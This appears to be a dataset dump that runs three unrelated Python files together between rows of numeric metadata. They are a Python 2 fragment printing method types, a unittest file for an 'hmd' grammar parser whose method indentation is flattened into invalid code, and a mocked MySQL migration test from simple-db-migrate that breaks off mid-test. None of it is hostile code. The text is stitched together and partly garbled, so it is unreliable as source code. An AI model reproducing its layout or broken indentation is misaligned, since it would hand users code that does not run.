def __repr__(self):
return 'some old-style C obj'
# Same checks for the old-style class, unbound then bound.
print type(C.foo)
print type(C.foo.im_func), type(C.foo.__func__)
print type(C.foo.im_self), type(C.foo.__self__)
print type(C.foo.im_class)
print repr(C.foo)
print type(C().foo)
print type(C().foo.im_func), type(C().foo.__func__)
print type(C().foo.im_self), type(C().foo.__self__)
print type(C().foo.im_class)
print repr(C().foo)
| 22.4
| 51
| 0.672991
| 168
| 896
| 3.279762
| 0.107143
| 0.203267
| 0.348457
| 0.377495
| 0.92559
| 0.92559
| 0.92559
| 0.92559
| 0.92559
| 0.798548
| 0
| 0
| 0.145089
| 896
| 39
| 52
| 22.974359
| 0.719321
| 0.018973
| 0
| 0.866667
| 0
| 0
| 0.034208
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.066667
| 0
| null | null | 0.666667
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 1
|
0
| 13
|
6feca04ba064667ade57c9288c4d2c8e49ec06c0
| 13,360
|
py
|
Python
|
hmd/tests/test_parser.py
|
fossabot/hmd
|
dda00daea71449d7338b573e11a24b2db7dbd7c7
|
[
"MIT"
] | null | null | null |
hmd/tests/test_parser.py
|
fossabot/hmd
|
dda00daea71449d7338b573e11a24b2db7dbd7c7
|
[
"MIT"
] | null | null | null |
hmd/tests/test_parser.py
|
fossabot/hmd
|
dda00daea71449d7338b573e11a24b2db7dbd7c7
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from src.abstract.automata.automata import AbstractAutomataMachine
from src.abstract.lexer.lexer import AbstractLexer
from src.abstract.lexer.token import AbstractToken
from src.abstract.parser.parser import AbstractParser
from src.mindslab.grammar import HMDGrammar
from src.mindslab.syntax import *
import unittest
class TestParser(unittest.TestCase):
'''
: unit tests for parser class.
'''
lexer = AbstractLexer(HMDSyntaxDefault)
parser = AbstractParser(HMDGrammar())
def test_parser_empty_string(self):
    """Parsing an empty string yields an empty result."""
    self.assertEqual(self.parser.parse(''), [])

def test_parser_empty_list(self):
    """Parsing an empty token list yields a falsy result."""
    self.assertFalse(self.parser.parse([]))

def test_parser_empty_list_string(self):
    """A list holding one empty string parses to a falsy result."""
    self.assertFalse(self.parser.parse(['']))

def test_parser_empty_list_strings(self):
    """A list of several empty strings parses to a falsy result."""
    self.assertFalse(self.parser.parse(['', ''])) 
#
# syntax: valid
#
#
# syntax: invalid
#
def test_parser_invalid_syntax_empty(self):
    """'()' — an empty group is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('()')))

def test_parser_invalid_syntax_leading_double(self):
    """'(()' — an unbalanced leading parenthesis is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('(()')))

def test_parser_invalid_syntax_trailing_double(self):
    """'())' — an unbalanced trailing parenthesis is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('())')))

def test_parser_invalid_syntax_nested(self):
    """'(())' — an empty nested group is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('(())')))
def test_parser_invalid_syntax_sequel(self):
    """A bare '+' operator is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('+')))

def test_parser_invalid_syntax_sequels(self):
    """Repeated '++' operators are rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('++')))

def test_parser_invalid_syntax_sequel_missing_count(self):
    """'(+)' — '+' inside a group without a count is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('(+)')))

def test_parser_invalid_syntax_sequel_missing_count_nested(self):
    """'(+())' — '+' with a nested empty group is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('(+())')))

def test_parser_invalid_syntax_sequel_leading_missing_count(self):
    """'+()' — leading '+' before a group without a count is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('+()')))

def test_parser_invalid_syntax_sequel_trailing_missing_count(self):
    """'()+' — trailing '+' after a group without a count is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('()+')))
def test_parser_invalid_syntax_prequel(self):
    """A bare '-' operator is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('-')))

def test_parser_invalid_syntax_prequels(self):
    """Repeated '--' operators are rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('--')))

def test_parser_invalid_syntax_prequel_missing_count(self):
    """'(-)' — '-' inside a group without a count is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('(-)')))

def test_parser_invalid_syntax_prequel_missing_count_nested(self):
    """'(-())' — '-' with a nested empty group is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('(-())')))

def test_parser_invalid_syntax_prequel_leading_missing_count(self):
    """'-()' — leading '-' before a group without a count is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('-()')))

def test_parser_invalid_syntax_prequel_trailing_missing_count(self):
    """'()-' — trailing '-' after a group without a count is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('()-')))
def test_parser_invalid_syntax_following(self):
    """A bare '@' operator is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('@')))

def test_parser_invalid_syntax_followings(self):
    """Repeated '@@' operators are rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('@@')))

def test_parser_invalid_syntax_following_missing_count(self):
    """'(@)' — '@' inside a group without a count is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('(@)')))

def test_parser_invalid_syntax_following_missing_count_nested(self):
    """'(@())' — '@' with a nested empty group is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('(@())')))

def test_parser_invalid_syntax_following_leading_missing_count(self):
    """'@()' — leading '@' before a group without a count is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('@()')))

def test_parser_invalid_syntax_following_trailing_missing_count(self):
    """'()@' — trailing '@' after a group without a count is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('()@')))
def test_parser_invalid_syntax_not(self):
    """A bare '!' operator is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('!')))

def test_parser_invalid_syntax_not_space_between(self):
    """'! ' — '!' followed only by whitespace is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('! ')))

def test_parser_invalid_syntax_nots(self):
    """Repeated '!!' operators are rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('!!')))

def test_parser_invalid_syntax_nots_space_between(self):
    """'! !' — two '!' operators split by whitespace are rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('! !')))

def test_parser_invalid_syntax_not_missing_count(self):
    """'(!)' — '!' inside a group without a count is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('(!)')))

def test_parser_invalid_syntax_not_missing_count_nested(self):
    """'(!())' — '!' with a nested empty group is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('(!())')))

def test_parser_invalid_syntax_not_leading_missing_count(self):
    """'!()' — leading '!' before a group without a count is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('!()')))

def test_parser_invalid_syntax_not_trailing_missing_count(self):
    """'()!' — trailing '!' after a group without a count is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('()!')))
def test_parser_invalid_syntax_hat(self):
    """A bare '^' operator is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('^')))

def test_parser_invalid_syntax_hats(self):
    """Repeated '^^' operators are rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('^^')))

def test_parser_invalid_syntax_hat_space_between(self):
    """'^ 1' — whitespace between '^' and its count is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('^ 1')))

def test_parser_invalid_syntax_hat_missing_count(self):
    """'(^)' — '^' inside a group without a count is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('(^)')))

def test_parser_invalid_syntax_hat_missing_count_nested(self):
    """'(^())' — '^' with a nested empty group is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('(^())')))

def test_parser_invalid_syntax_hat_leading_missing_count(self):
    """'^()' — leading '^' before a group without a count is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('^()')))

def test_parser_invalid_syntax_hat_trailing_missing_count(self):
    """'()^' — trailing '^' after a group without a count is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('()^')))
def test_parser_invalid_syntax_wildcard(self):
    """A bare '%' operator is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('%')))

def test_parser_invalid_syntax_wildcards(self):
    """Repeated '%%' operators are rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('%%')))

def test_parser_invalid_syntax_wildcard_missing_count(self):
    """'(%)' — '%' inside a group without a count is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('(%)')))

def test_parser_invalid_syntax_wildcard_missing_count_nested(self):
    """'(%())' — '%' with a nested empty group is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('(%())')))

def test_parser_invalid_syntax_wildcard_leading_missing_count(self):
    """'%()' — leading '%' before a group without a count is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('%()')))

def test_parser_invalid_syntax_wildcard_trailing_missing_count(self):
    """'()%' — trailing '%' after a group without a count is rejected."""
    self.assertFalse(self.parser.parse(self.lexer.lex('()%')))
def test_parser_invalid_syntax_or(self):
    """A bare '|' is not a valid expression."""
    parsed = self.parser.parse(self.lexer.lex('|'))
    self.assertFalse(parsed)

def test_parser_invalid_syntax_ors(self):
    """Two consecutive '|' operators are not a valid expression."""
    parsed = self.parser.parse(self.lexer.lex('||'))
    self.assertFalse(parsed)

def test_parser_invalid_syntax_or_missing_count(self):
    """'|' inside a group without a count must be rejected."""
    parsed = self.parser.parse(self.lexer.lex('(|)'))
    self.assertFalse(parsed)

def test_parser_invalid_syntax_or_missing_count_nested(self):
    """'|' before a nested group without a count must be rejected."""
    parsed = self.parser.parse(self.lexer.lex('(|())'))
    self.assertFalse(parsed)

def test_parser_invalid_syntax_or_leading_missing_count(self):
    """A leading '|' with no count before the group must be rejected."""
    parsed = self.parser.parse(self.lexer.lex('|()'))
    self.assertFalse(parsed)

def test_parser_invalid_syntax_or_trailing_missing_count(self):
    """A trailing '|' with no count after the group must be rejected."""
    parsed = self.parser.parse(self.lexer.lex('()|'))
    self.assertFalse(parsed)
def test_parser_invalid_syntax_identifier(self):
    """A bare '$' is not a valid expression."""
    parsed = self.parser.parse(self.lexer.lex('$'))
    self.assertFalse(parsed)

def test_parser_invalid_syntax_identifiers(self):
    """Two consecutive '$' tokens are not a valid expression."""
    parsed = self.parser.parse(self.lexer.lex('$$'))
    self.assertFalse(parsed)

def test_parser_invalid_syntax_identifier_missing_count(self):
    """'$' inside a group without a count must be rejected."""
    parsed = self.parser.parse(self.lexer.lex('($)'))
    self.assertFalse(parsed)

def test_parser_invalid_syntax_identifier_missing_count_nested(self):
    """'$' before a nested group without a count must be rejected."""
    parsed = self.parser.parse(self.lexer.lex('($())'))
    self.assertFalse(parsed)

def test_parser_invalid_syntax_identifier_leading_missing_count(self):
    """A leading '$' with no count before the group must be rejected."""
    parsed = self.parser.parse(self.lexer.lex('$()'))
    self.assertFalse(parsed)

def test_parser_invalid_syntax_identifier_trailing_missing_count(self):
    """A trailing '$' with no count after the group must be rejected."""
    parsed = self.parser.parse(self.lexer.lex('()$'))
    self.assertFalse(parsed)
def test_parser_invalid_syntax_assignment(self):
    """A bare '=' is not a valid expression."""
    parsed = self.parser.parse(self.lexer.lex('='))
    self.assertFalse(parsed)

def test_parser_invalid_syntax_assignments(self):
    """Two consecutive '=' tokens are not a valid expression."""
    parsed = self.parser.parse(self.lexer.lex('=='))
    self.assertFalse(parsed)

def test_parser_invalid_syntax_not_assignments(self):
    """'!=' is not a valid expression in this grammar."""
    parsed = self.parser.parse(self.lexer.lex('!='))
    self.assertFalse(parsed)

def test_parser_invalid_syntax_assignment_missing_count(self):
    """'=' inside a group without a count must be rejected."""
    parsed = self.parser.parse(self.lexer.lex('(=)'))
    self.assertFalse(parsed)

def test_parser_invalid_syntax_assignment_missing_count_nested(self):
    """'=' before a nested group without a count must be rejected."""
    parsed = self.parser.parse(self.lexer.lex('(=())'))
    self.assertFalse(parsed)

def test_parser_invalid_syntax_assignment_leading_missing_count(self):
    """A leading '=' with no count before the group must be rejected."""
    parsed = self.parser.parse(self.lexer.lex('=()'))
    self.assertFalse(parsed)

def test_parser_invalid_syntax_assignment_trailing_missing_count(self):
    """A trailing '=' with no count after the group must be rejected."""
    parsed = self.parser.parse(self.lexer.lex('()='))
    self.assertFalse(parsed)
| 32.115385
| 75
| 0.646183
| 1,531
| 13,360
| 5.397126
| 0.047028
| 0.150067
| 0.103836
| 0.175723
| 0.929566
| 0.923757
| 0.919158
| 0.919158
| 0.913349
| 0.913349
| 0
| 0.000099
| 0.244386
| 13,360
| 415
| 76
| 32.192771
| 0.818425
| 0.006063
| 0
| 0.57958
| 0
| 0
| 0.013201
| 0
| 0
| 0
| 0
| 0
| 0.198198
| 1
| 0.198198
| false
| 0
| 0.021021
| 0
| 0.228228
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b5176ed252f8654f3eb7185d8b778b19a18c818f
| 27,040
|
py
|
Python
|
tests/mysql_test.py
|
wesrog/simple-db-migrate
|
5d5637cbb96424676571431bb688f8b977b0837d
|
[
"Apache-2.0"
] | 1
|
2017-12-14T22:20:30.000Z
|
2017-12-14T22:20:30.000Z
|
tests/mysql_test.py
|
wesrog/simple-db-migrate
|
5d5637cbb96424676571431bb688f8b977b0837d
|
[
"Apache-2.0"
] | null | null | null |
tests/mysql_test.py
|
wesrog/simple-db-migrate
|
5d5637cbb96424676571431bb688f8b977b0837d
|
[
"Apache-2.0"
] | null | null | null |
import os
import unittest
import simple_db_migrate
from mock import patch, Mock, MagicMock, call
from simple_db_migrate.config import *
from simple_db_migrate.mysql import *
from tests import BaseTest, create_file, create_migration_file, delete_files, create_config
class MySQLTest(BaseTest):
    """Unit tests for the MySQL backend of simple_db_migrate.

    setUp wires a fake DB-API driver/connection/cursor trio, so each test can
    assert the exact SQL strings, commit/rollback and close counts the MySQL
    class issues without touching a real server.

    Fixes applied in review:
    - ``except Exception, e`` replaced by ``except Exception as e`` (valid on
      Python 2.6+ and required on Python 3).
    - stray trailing semicolon removed in setUp.
    - deprecated ``assertEquals`` alias normalized to ``assertEqual`` for
      consistency with the rest of the class.
    """

    def setUp(self):
        """Create scripted mocks for driver, connection and cursor."""
        # Maps of "last executed SQL" -> scripted return value; an Exception
        # value is raised instead (see side_effect() below).
        self.execute_returns = {}
        self.fetchone_returns = {'select count(*) from __db_version__;': [0]}
        self.close_returns = {}
        self.last_execute_command = ''
        self.config_dict = {'database_script_encoding': 'utf8',
                            'database_encoding': 'utf8',
                            'database_host': 'localhost',
                            'database_user': 'root',
                            'database_password': '',
                            'database_name': 'migration_test',
                            'database_version_table': '__db_version__',
                            'drop_db_first': False
                            }
        # spec_set=dict + wraps keeps dict semantics while recording access.
        self.config_mock = MagicMock(spec_set=dict, wraps=self.config_dict)
        self.cursor_mock = Mock(**{"execute": Mock(side_effect=self.execute_side_effect),
                                   "close": Mock(side_effect=self.close_side_effect),
                                   "fetchone": Mock(side_effect=self.fetchone_side_effect)})
        self.db_mock = Mock(**{"cursor.return_value": self.cursor_mock})
        self.db_driver_mock = Mock(**{"connect.return_value": self.db_mock})

    def test_it_should_use_mysqldb_as_driver(self):
        """Without an injected driver, MySQL must import and use MySQLdb."""
        mysqldb_mock = MagicMock()
        with patch.dict('sys.modules', MySQLdb=mysqldb_mock):
            mysql = MySQL(self.config_mock)
            self.assertNotEqual(0, mysqldb_mock.connect.call_count)

    def test_it_should_stop_process_when_an_error_occur_during_connect_database(self):
        """A connect failure must be wrapped and abort before any query."""
        self.db_driver_mock.connect.side_effect = Exception("error when connecting")
        try:
            mysql = MySQL(self.config_mock, self.db_driver_mock)
            self.fail("it should not get here")
        except Exception as e:
            self.assertEqual("could not connect to database: error when connecting", str(e))
        # Nothing may have been executed or closed after the failed connect.
        self.assertEqual(0, self.db_mock.query.call_count)
        self.assertEqual(0, self.db_mock.commit.call_count)
        self.assertEqual(0, self.db_mock.close.call_count)
        self.assertEqual(0, self.cursor_mock.execute.call_count)
        self.assertEqual(0, self.cursor_mock.close.call_count)

    def test_it_should_create_database_and_version_table_on_init_if_not_exists(self):
        """Construction must create the database and the version table."""
        mysql = MySQL(self.config_mock, self.db_driver_mock)
        expected_query_calls = [
            call('create database if not exists `migration_test`;')
        ]
        self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
        self.db_mock.select_db.assert_called_with('migration_test')
        self.assertEqual(2, self.db_mock.commit.call_count)
        self.assertEqual(4, self.db_mock.close.call_count)
        expected_execute_calls = [
            call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
            call('select count(*) from __db_version__;'),
            call('insert into __db_version__ (version) values ("0")')
        ]
        self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
        self.assertEqual(3, self.cursor_mock.close.call_count)

    def test_it_should_drop_database_on_init_if_its_asked(self):
        """With drop_db_first the database is dropped before creation."""
        self.config_dict["drop_db_first"] = True
        mysql = MySQL(self.config_mock, self.db_driver_mock)
        expected_query_calls = [
            call('set foreign_key_checks=0; drop database if exists `migration_test`;'),
            call('create database if not exists `migration_test`;')
        ]
        self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
        self.db_mock.select_db.assert_called_with('migration_test')
        self.assertEqual(2, self.db_mock.commit.call_count)
        self.assertEqual(5, self.db_mock.close.call_count)
        expected_execute_calls = [
            call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
            call('select count(*) from __db_version__;'),
            call('insert into __db_version__ (version) values ("0")')
        ]
        self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
        self.assertEqual(3, self.cursor_mock.close.call_count)

    def test_it_should_stop_process_when_an_error_occur_during_drop_database(self):
        """A failing drop must raise a descriptive error and stop early."""
        self.config_dict["drop_db_first"] = True
        self.db_mock.query.side_effect = Exception("error when dropping")
        try:
            mysql = MySQL(self.config_mock, self.db_driver_mock)
            self.fail("it should not get here")
        except Exception as e:
            self.assertEqual("can't drop database 'migration_test'; \nerror when dropping", str(e))
        expected_query_calls = [
            call('set foreign_key_checks=0; drop database if exists `migration_test`;')
        ]
        self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
        self.assertEqual(0, self.db_mock.commit.call_count)
        self.assertEqual(1, self.db_mock.close.call_count)
        self.assertEqual(0, self.cursor_mock.execute.call_count)
        self.assertEqual(0, self.cursor_mock.close.call_count)

    def test_it_should_execute_migration_up_and_update_schema_version(self):
        """change() going up runs the SQL then records the version row."""
        mysql = MySQL(self.config_mock, self.db_driver_mock)
        mysql.change("create table spam();", "20090212112104", "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table spam();", "drop table spam;")
        expected_query_calls = [
            call('create database if not exists `migration_test`;')
        ]
        self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
        self.db_mock.select_db.assert_called_with('migration_test')
        self.assertEqual(4, self.db_mock.commit.call_count)
        self.assertEqual(6, self.db_mock.close.call_count)
        expected_execute_calls = [
            call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
            call('select count(*) from __db_version__;'),
            call('insert into __db_version__ (version) values ("0")'),
            call('create table spam()'),
            call('insert into __db_version__ (version, label, name, sql_up, sql_down) values ("20090212112104", NULL, "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table spam();", "drop table spam;");')
        ]
        self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
        self.assertEqual(5, self.cursor_mock.close.call_count)

    def test_it_should_execute_migration_down_and_update_schema_version(self):
        """change() going down runs the SQL then deletes the version row."""
        mysql = MySQL(self.config_mock, self.db_driver_mock)
        mysql.change("drop table spam;", "20090212112104", "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table spam();", "drop table spam;", False)
        expected_query_calls = [
            call('create database if not exists `migration_test`;')
        ]
        self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
        self.db_mock.select_db.assert_called_with('migration_test')
        self.assertEqual(4, self.db_mock.commit.call_count)
        self.assertEqual(6, self.db_mock.close.call_count)
        expected_execute_calls = [
            call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
            call('select count(*) from __db_version__;'),
            call('insert into __db_version__ (version) values ("0")'),
            call('drop table spam'),
            call('delete from __db_version__ where version = "20090212112104";')
        ]
        self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
        self.assertEqual(5, self.cursor_mock.close.call_count)

    def test_it_should_use_label_version_when_updating_schema_version(self):
        """A label_version must be written into the version row."""
        mysql = MySQL(self.config_mock, self.db_driver_mock)
        mysql.change("create table spam();", "20090212112104", "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table spam();", "drop table spam;", label_version="label")
        expected_query_calls = [
            call('create database if not exists `migration_test`;')
        ]
        self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
        self.db_mock.select_db.assert_called_with('migration_test')
        self.assertEqual(4, self.db_mock.commit.call_count)
        self.assertEqual(6, self.db_mock.close.call_count)
        expected_execute_calls = [
            call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
            call('select count(*) from __db_version__;'),
            call('insert into __db_version__ (version) values ("0")'),
            call('create table spam()'),
            call('insert into __db_version__ (version, label, name, sql_up, sql_down) values ("20090212112104", "label", "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table spam();", "drop table spam;");')
        ]
        self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
        self.assertEqual(5, self.cursor_mock.close.call_count)

    def test_it_should_raise_whem_migration_sql_has_a_syntax_error(self):
        """Unbalanced parentheses in the migration SQL must raise."""
        # NOTE(review): "whem" in the method name is a historical typo; kept
        # because renaming would change the test's public identifier.
        mysql = MySQL(self.config_mock, self.db_driver_mock)
        self.assertRaisesWithMessage(Exception, "error executing migration: invalid sql syntax 'create table foo(); create table spam());'", mysql.change,
                                     "create table foo(); create table spam());", "20090212112104", "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table foo(); create table spam());", "drop table spam;", label_version="label")

    def test_it_should_stop_process_when_an_error_occur_during_database_change(self):
        """A failing statement must roll back and raise MigrationException."""
        self.execute_returns["insert into spam"] = Exception("invalid sql")
        try:
            mysql = MySQL(self.config_mock, self.db_driver_mock)
            mysql.change("create table spam(); insert into spam", "20090212112104", "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table spam();", "drop table spam;", label_version="label")
        except Exception as e:
            self.assertEqual("error executing migration: invalid sql\n\n[ERROR DETAILS] SQL command was:\ninsert into spam", str(e))
            self.assertTrue(isinstance(e, simple_db_migrate.core.exceptions.MigrationException))
        expected_query_calls = [
            call('create database if not exists `migration_test`;')
        ]
        self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
        self.db_mock.select_db.assert_called_with('migration_test')
        self.assertEqual(1, self.db_mock.rollback.call_count)
        self.assertEqual(2, self.db_mock.commit.call_count)
        self.assertEqual(5, self.db_mock.close.call_count)
        expected_execute_calls = [
            call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
            call('select count(*) from __db_version__;'),
            call('insert into __db_version__ (version) values ("0")'),
            call('create table spam()'),
            call('insert into spam')
        ]
        self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
        self.assertEqual(3, self.cursor_mock.close.call_count)

    def test_it_should_stop_process_when_an_error_occur_during_log_schema_version(self):
        """A failure while recording the version row must roll back."""
        self.execute_returns['insert into __db_version__ (version, label, name, sql_up, sql_down) values ("20090212112104", "label", "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table spam();", "drop table spam;");'] = Exception("invalid sql")
        try:
            mysql = MySQL(self.config_mock, self.db_driver_mock)
            mysql.change("create table spam();", "20090212112104", "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table spam();", "drop table spam;", label_version="label")
        except Exception as e:
            self.assertEqual('error logging migration: invalid sql\n\n[ERROR DETAILS] SQL command was:\n20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration', str(e))
            self.assertTrue(isinstance(e, simple_db_migrate.core.exceptions.MigrationException))
        expected_query_calls = [
            call('create database if not exists `migration_test`;')
        ]
        self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
        self.db_mock.select_db.assert_called_with('migration_test')
        self.assertEqual(1, self.db_mock.rollback.call_count)
        self.assertEqual(3, self.db_mock.commit.call_count)
        self.assertEqual(6, self.db_mock.close.call_count)
        expected_execute_calls = [
            call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
            call('select count(*) from __db_version__;'),
            call('insert into __db_version__ (version) values ("0")'),
            call('create table spam()'),
            call('insert into __db_version__ (version, label, name, sql_up, sql_down) values ("20090212112104", "label", "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table spam();", "drop table spam;");')
        ]
        self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
        self.assertEqual(4, self.cursor_mock.close.call_count)

    def test_it_should_log_execution_when_a_function_is_given_when_updating_schema_version(self):
        """change() must report progress through the execution_log callback."""
        execution_log_mock = Mock()
        mysql = MySQL(self.config_mock, self.db_driver_mock)
        mysql.change("create table spam();", "20090212112104", "20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration", "create table spam();", "drop table spam;", execution_log=execution_log_mock)
        expected_execution_log_calls = [
            call('create table spam()\n-- 0 row(s) affected\n'),
            call('migration 20090212112104_test_it_should_execute_migration_down_and_update_schema_version.migration registered\n')
        ]
        self.assertEqual(expected_execution_log_calls, execution_log_mock.mock_calls)

    def test_it_should_get_current_schema_version(self):
        """The latest version row must be returned as the current version."""
        self.fetchone_returns = {'select count(*) from __db_version__;': [0], 'select version from __db_version__ order by id desc limit 0,1;': ["0"]}
        mysql = MySQL(self.config_mock, self.db_driver_mock)
        self.assertEqual("0", mysql.get_current_schema_version())
        expected_query_calls = [
            call('create database if not exists `migration_test`;')
        ]
        self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
        self.db_mock.select_db.assert_called_with('migration_test')
        self.assertEqual(2, self.db_mock.commit.call_count)
        self.assertEqual(5, self.db_mock.close.call_count)
        expected_execute_calls = [
            call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
            call('select count(*) from __db_version__;'),
            call('insert into __db_version__ (version) values ("0")'),
            call('select version from __db_version__ order by id desc limit 0,1;')
        ]
        self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
        self.assertEqual(4, self.cursor_mock.close.call_count)

    def test_it_should_get_all_schema_versions(self):
        """All version rows must be returned, ordered by id."""
        expected_versions = []
        expected_versions.append("0")
        expected_versions.append("20090211120001")
        expected_versions.append("20090211120002")
        expected_versions.append("20090211120003")
        self.cursor_mock.fetchall.return_value = tuple(zip(expected_versions))
        mysql = MySQL(self.config_mock, self.db_driver_mock)
        schema_versions = mysql.get_all_schema_versions()
        self.assertEqual(len(expected_versions), len(schema_versions))
        for version in schema_versions:
            self.assertTrue(version in expected_versions)
        expected_query_calls = [
            call('create database if not exists `migration_test`;')
        ]
        self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
        self.db_mock.select_db.assert_called_with('migration_test')
        self.assertEqual(2, self.db_mock.commit.call_count)
        self.assertEqual(5, self.db_mock.close.call_count)
        expected_execute_calls = [
            call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
            call('select count(*) from __db_version__;'),
            call('insert into __db_version__ (version) values ("0")'),
            call('select version from __db_version__ order by id;')
        ]
        self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
        self.assertEqual(4, self.cursor_mock.close.call_count)

    def test_it_should_get_all_schema_migrations(self):
        """All migration rows map onto Migration objects field by field."""
        expected_versions = []
        expected_versions.append([1, "0", None, None, None, None])
